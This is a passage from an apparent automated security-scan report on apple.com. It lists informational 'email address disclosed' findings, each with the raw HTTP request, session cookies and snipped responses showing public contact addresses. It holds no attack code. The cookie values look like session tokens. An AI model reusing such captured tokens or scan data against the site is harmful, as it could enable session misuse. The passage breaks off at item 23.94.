Cookie: ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; geo=US; s_ria=Flash%2010%7C; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; sfa=us; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3Bch%3Dipod%26vn%3D1%3B; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3Bipod%3Dtrue%3B; s_orientation=%5B%5BB%5D%5D; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2Cipod%3D2%2C; s_ppv=60%2C60%2C1012%2C; s_orientationHeight=1012; dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac%2Cappleipod; s_pv=ipod%20-%20accessories%20(us); asmetrics=%257B%2522store%2522%253A%257B%2522sid%2522%253A%2522wHF2F2PHCCCX72KDY%2522%252C%2522vh%2522%253Atrue%257D%257D; s_cc=true; s_sq=appleglobal%2Capplestoreww%2Capplestoreus%2Capplestoreusconsum%3D%2526pid%253DAOS%25253A%252520home%252520-%252520Return%2526pidt%253D1%2526oid%253DMTkyMTQ2NTI%2526oidt%253D1%2526ot%253DA%2526oi%253D1%26appleipod%2Cappleusitunesipod%3D%2526pid%253Dipod%252520-%252520accessories%252520%2528us%2529%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fstore.apple.com%25252Fus%25252Fbrowse%25252Fhome%25252Fshop_ipod%25252Fipod_accessories%25252Fcar_audio_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 17:56:47 GMT
Server: Apache/1.3.41-ps_webdav_01 (Darwin)
Last-Modified: Tue, 25 Jan 2011 20:20:22 GMT
ETag: "2fbbb0-34424-4d3f3086"
Accept-Ranges: bytes
Content-Length: 214052
Keep-Alive: timeout=360, max=99999
Connection: Keep-Alive
Content-Type: application/x-javascript
x-frame-options: sameorigin

/*

Copyright .. 2000-2010 Apple Inc. All Rights Reserved.

*/

var $=function(A){if("string"===typeof A||A instanceof String){return document.getElementById(A)}return A};Package=(function(){v
...[SNIP]...
ailSubscription,apple.widget.BaseWidget);var ServerStatus={good:"SUCCESS",bad:"ERROR",busy:"BUSY",off:"OFF",on:"ON",format:"FORMAT"};apple.widget.EmailSubscription.DEFAULTS={emailPlaceholder:"example: steve@me.com",submitUrl:"email-server-reply.txt",urlArgs:{},argName:"emailAddress",emailFieldSpec:"input.notify_email",submitButtonSpec:".notify_submit",formSpec:"form",fadeDuration:350,showForm:{SUCCESS:false,ERR
...[SNIP]...

23.86. http://storeimages.apple.com/1806/store.apple.com/rs/js/store/release/apple.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://storeimages.apple.com
Path:   /1806/store.apple.com/rs/js/store/release/apple.js

Issue detail

The following email address was disclosed in the response:

Request

GET /1806/store.apple.com/rs/js/store/release/apple.js HTTP/1.1
Host: storeimages.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome; s_pathLength=homepage%3D1%2C; geo=US; s_sq=%5B%5BB%5D%5D; s_ppv=100%2C100%2C1012%2C; s_ria=Flash%2010%7C; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_orientationHeight=1012; s_invisit_us=homepage%3Dtrue%3B; s_cc=true; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=apple%20-%20index%20(US);

Response

HTTP/1.1 200 OK
Last-Modified: Tue, 25 Jan 2011 20:20:22 GMT
ETag: "20fb93-34424-4d3f3086"
Server: Apache/1.3.41-ps_webdav_01 (Darwin)
Content-Type: application/x-javascript
x-frame-options: sameorigin
Cache-Control: max-age=789
Expires: Thu, 03 Feb 2011 18:02:39 GMT
Date: Thu, 03 Feb 2011 17:49:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 214052

/*

Copyright .. 2000-2010 Apple Inc. All Rights Reserved.

*/

var $=function(A){if("string"===typeof A||A instanceof String){return document.getElementById(A)}return A};Package=(function(){v
...[SNIP]...
ailSubscription,apple.widget.BaseWidget);var ServerStatus={good:"SUCCESS",bad:"ERROR",busy:"BUSY",off:"OFF",on:"ON",format:"FORMAT"};apple.widget.EmailSubscription.DEFAULTS={emailPlaceholder:"example: steve@me.com",submitUrl:"email-server-reply.txt",urlArgs:{},argName:"emailAddress",emailFieldSpec:"input.notify_email",submitButtonSpec:".notify_submit",formSpec:"form",fadeDuration:350,showForm:{SUCCESS:false,ERR
...[SNIP]...

23.87. https://storeimages.apple.com.edgekey.net/1806/store.apple.com/rs/js/store/release/apple.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://storeimages.apple.com.edgekey.net
Path:   /1806/store.apple.com/rs/js/store/release/apple.js

Issue detail

The following email address was disclosed in the response:

Request

GET /1806/store.apple.com/rs/js/store/release/apple.js HTTP/1.1
Host: storeimages.apple.com.edgekey.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Last-Modified: Tue, 25 Jan 2011 20:20:22 GMT
ETag: "a7c71-34424-4d3f3086"
Content-Type: application/x-javascript
x-request-id: 1c4a859a-3175-4886-a534-f45c3db7ad2d
x-frame-options: sameorigin
Expires: Thu, 03 Feb 2011 18:31:59 GMT
Date: Thu, 03 Feb 2011 18:11:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 214052

/*

Copyright .. 2000-2010 Apple Inc. All Rights Reserved.

*/

var $=function(A){if("string"===typeof A||A instanceof String){return document.getElementById(A)}return A};Package=(function(){v
...[SNIP]...
ailSubscription,apple.widget.BaseWidget);var ServerStatus={good:"SUCCESS",bad:"ERROR",busy:"BUSY",off:"OFF",on:"ON",format:"FORMAT"};apple.widget.EmailSubscription.DEFAULTS={emailPlaceholder:"example: steve@me.com",submitUrl:"email-server-reply.txt",urlArgs:{},argName:"emailAddress",emailFieldSpec:"input.notify_email",submitButtonSpec:".notify_submit",formSpec:"form",fadeDuration:350,showForm:{SUCCESS:false,ERR
...[SNIP]...

23.88. http://www.apple.com/accessibility/itunes/vision.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.apple.com
Path:   /accessibility/itunes/vision.html

Issue detail

The following email address was disclosed in the response:

Request

GET /accessibility/itunes/vision.html HTTP/1.1
Host: www.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2C; geo=US; s_sq=appleglobal%2Cappleusmac%3D%2526pid%253Dmac%252520-%252520index%252520(us)%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.apple.com%25252Fipod%25252F_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1%26appleusipad%3D%2526pid%253Dipad%252520-%252520ios%2525C2%2525A04%252520(us)%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.apple.com%25252Fmac%25252F_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=48%2C48%2C1012%2C; s_ria=Flash%2010%7C; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_orientationHeight=1012; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3B; s_cc=true; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=mac%20-%20index%20(us);

Response

HTTP/1.1 200 OK
ntCoent-Length: 16709
Content-Type: text/html; charset=utf-8
Server: Apache/2.2.11 (Unix)
Cache-Control: max-age=106
Expires: Thu, 03 Feb 2011 17:55:50 GMT
Date: Thu, 03 Feb 2011 17:54:04 GMT
Content-Length: 16709
Connection: close
X-N: S

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-us">
<head>
   <meta http-equi
...[SNIP]...
<a href="mailto:accessibility@apple.com">
...[SNIP]...
<a href="mailto:accessibility@apple.com">
...[SNIP]...
<a class="image" href="mailto:accessibility@apple.com" title="Email accessibility@apple.com">
...[SNIP]...

23.89. http://www.apple.com/accessibility/macosx/vision.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.apple.com
Path:   /accessibility/macosx/vision.html

Issue detail

The following email address was disclosed in the response:

Request

GET /accessibility/macosx/vision.html HTTP/1.1
Host: www.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2C; geo=US; s_sq=appleglobal%2Cappleusmac%3D%2526pid%253Dmac%252520-%252520index%252520(us)%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.apple.com%25252Fipod%25252F_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1%26appleusipad%3D%2526pid%253Dipad%252520-%252520ios%2525C2%2525A04%252520(us)%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.apple.com%25252Fmac%25252F_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=48%2C48%2C1012%2C; s_ria=Flash%2010%7C; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_orientationHeight=1012; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3B; s_cc=true; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=mac%20-%20index%20(us);

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Apache/2.2.11 (Unix)
ntCoent-length: 23480
Cache-Control: max-age=548
Expires: Thu, 03 Feb 2011 18:03:12 GMT
Date: Thu, 03 Feb 2011 17:54:04 GMT
Content-Length: 23480
Connection: close
X-N: S

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-us">
<head>
   <meta http-equi
...[SNIP]...
<a href="mailto:accessibility@apple.com">
...[SNIP]...
<a href="mailto:accessibility@apple.com">
...[SNIP]...
<a class="image" href="mailto:accessibility@apple.com" title="Email accessibility@apple.com">
...[SNIP]...

23.90. http://www.apple.com/itunes/companies/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.apple.com
Path:   /itunes/companies/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /itunes/companies/ HTTP/1.1
Host: www.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2C; geo=US; s_sq=appleglobal%2Cappleusmac%3D%2526pid%253Dmac%252520-%252520index%252520(us)%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.apple.com%25252Fipod%25252F_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1%26appleusipad%3D%2526pid%253Dipad%252520-%252520ios%2525C2%2525A04%252520(us)%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.apple.com%25252Fmac%25252F_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=48%2C48%2C1012%2C; s_ria=Flash%2010%7C; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_orientationHeight=1012; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3B; s_cc=true; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=mac%20-%20index%20(us);

Response

HTTP/1.1 200 OK
ntCoent-Length: 15171
Content-Type: text/html; charset=utf-8
Server: Apache/2.2.11 (Unix)
Cache-Control: max-age=442
Expires: Thu, 03 Feb 2011 18:01:15 GMT
Date: Thu, 03 Feb 2011 17:53:53 GMT
Content-Length: 15171
Connection: close
X-N: S

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
   <meta http-equiv="content-type" content="text/html; charset=utf-8" />
   <meta name="Author" content="Ap
...[SNIP]...
<a href="mailto:iTunesMarketing@apple.com">itunesmarketing@apple.com</a>
...[SNIP]...

23.91. http://www.apple.com/itunes/content-providers/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.apple.com
Path:   /itunes/content-providers/

Issue detail

The following email address was disclosed in the response:

Request

GET /itunes/content-providers/ HTTP/1.1
Host: www.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2C; geo=US; s_sq=appleglobal%2Cappleusmac%3D%2526pid%253Dmac%252520-%252520index%252520(us)%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.apple.com%25252Fipod%25252F_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1%26appleusipad%3D%2526pid%253Dipad%252520-%252520ios%2525C2%2525A04%252520(us)%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.apple.com%25252Fmac%25252F_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=48%2C48%2C1012%2C; s_ria=Flash%2010%7C; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_orientationHeight=1012; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3B; s_cc=true; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=mac%20-%20index%20(us);

Response

HTTP/1.1 200 OK
Server: Apache/2.2.11 (Unix)
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=214
Expires: Thu, 03 Feb 2011 17:57:28 GMT
Date: Thu, 03 Feb 2011 17:53:54 GMT
Content-Length: 16974
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
   <meta http-equiv="content-type" content="text/html; charset=utf-8" />
   <meta name="Author" content="Ap
...[SNIP]...
<a href="mailto:iTunesMarketing@apple.com">
...[SNIP]...

23.92. http://www.apple.com/itunes/corporatesales/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.apple.com
Path:   /itunes/corporatesales/

Issue detail

The following email address was disclosed in the response:

Request

GET /itunes/corporatesales/ HTTP/1.1
Host: www.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome%2Cappleitunes%2Cappleusitunesipod%2Cappleusipad%2Cappleusmac; s_pathLength=homepage%3D1%2Citunes%3D1%2Cipad%3D2%2Cmac%3D1%2C; geo=US; s_sq=appleglobal%2Cappleusmac%3D%2526pid%253Dmac%252520-%252520index%252520(us)%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.apple.com%25252Fipod%25252F_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1%26appleusipad%3D%2526pid%253Dipad%252520-%252520ios%2525C2%2525A04%252520(us)%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fwww.apple.com%25252Fmac%25252F_1%2526oidt%253D1%2526ot%253DA%2526oi%253D1; s_ppv=48%2C48%2C1012%2C; s_ria=Flash%2010%7C; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_orientationHeight=1012; s_invisit_us=homepage%3Dtrue%3Bitunes%3Dtrue%3Bipad%3Dtrue%3Bmac%3Dtrue%3B; s_cc=true; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3Bch%3Ditunes%26vn%3D1%3Bch%3Dipad%26vn%3D1%3Bch%3Dmac%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=mac%20-%20index%20(us);

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Apache/2.2.14 (Unix)
ntCoent-length: 10847
Cache-Control: max-age=285
Expires: Thu, 03 Feb 2011 17:58:40 GMT
Date: Thu, 03 Feb 2011 17:53:55 GMT
Content-Length: 10847
Connection: close
X-N: S

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
   <meta http-equiv="content-type" content="text/html; charset=utf-8" />
   <meta name="Author" content="Ap
...[SNIP]...
<a href="mailto:volumeitunes@group.apple.com">volumeitunes@group.apple.com</a>
...[SNIP]...

23.93. http://www.apple.com/pr/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.apple.com
Path:   /pr/

Issue detail

The following email address was disclosed in the response:

Request

GET /pr/ HTTP/1.1
Host: www.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=appleglobal%2Capplehome; s_pathLength=homepage%3D1%2C; geo=US; s_sq=%5B%5BB%5D%5D; s_ppv=100%2C100%2C1012%2C; s_ria=Flash%2010%7C; dssid2=16d90919-06cc-4154-b0ab-ecea038874a1; s_orientationHeight=1012; s_invisit_us=homepage%3Dtrue%3B; s_cc=true; ccl=jdzIb8K9vV85lgj7e4sRSa7IdqL3mZQgKYxUDOENQHhX4NgQ+hAHUjgfeXzwhT0VCFTyru8XWN+N/L/jGzQdpYsuk2VsqFGSRbYoRFzczGBT3k08MFdx7ArDyfn+0DUeklB3ZUvvxu2UGZL68tRXL5nMT2Qo6LXDFg/q92NkEy9l7Ex/aD5nRTHjg3bKpJ+d9yOL9KjL9tsu6MyHUSMFig/R05oZ1diiYGYKmnWDjirYA+366qqu5YCwZjGVMb1A0CnrJhwHt7JYisUlxFXcMpdOBiRmnAszqWRJTvqDZ0PHJ4GtEoGAAbGzJexrJBxwd1gKBY3lRlHxeRvk08jICn1OKruZekSYe6LYcunA7dbxGHwPUYvHCO3CqBvJzY9UNy046G49u5XHCPfIjmACnX8pQ/BKlNDkyD9h8r0DknuKwz5s342HyUWEA6KzRMT9F+OcHyNF2EbqvoTRb2A5O6P11IMLm1L/Dn8KZ6vTXXLHFrOR+o9muZkTFFNlmcrJ0IePJPb37Zspw5umwldBYgdsqrmUNcZQBoN1oGMUthjBbWvGVUIuZ9yuhyf1uCL6; s_vnum_us=ch%3Dhomepage%26vn%3D1%3B; s_orientation=%5B%5BB%5D%5D; s_vi=[CS]v1|26A574EF051633E8-40000181A05F3A9E[CE]; s_pv=apple%20-%20index%20(US);

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Apache/2.2.11 (Unix)
Cache-Control: max-age=303
Expires: Thu, 03 Feb 2011 17:55:21 GMT
Date: Thu, 03 Feb 2011 17:50:18 GMT
Content-Length: 17930
Connection: close

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
<head>
   <meta http-equiv="content-type" content="text/html; charset=utf-8" />
   <meta name="Author" content="Ap
...[SNIP]...
<a href="mailto:media.help@apple.com" title="Email the Apple Media Helpline">media.help@apple.com</a>
...[SNIP]...

23.94. http://www.apple.com/privacy/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.apple.com
Path:   /privacy/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /privacy/ HTTP/1.1
Host: www.apple.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
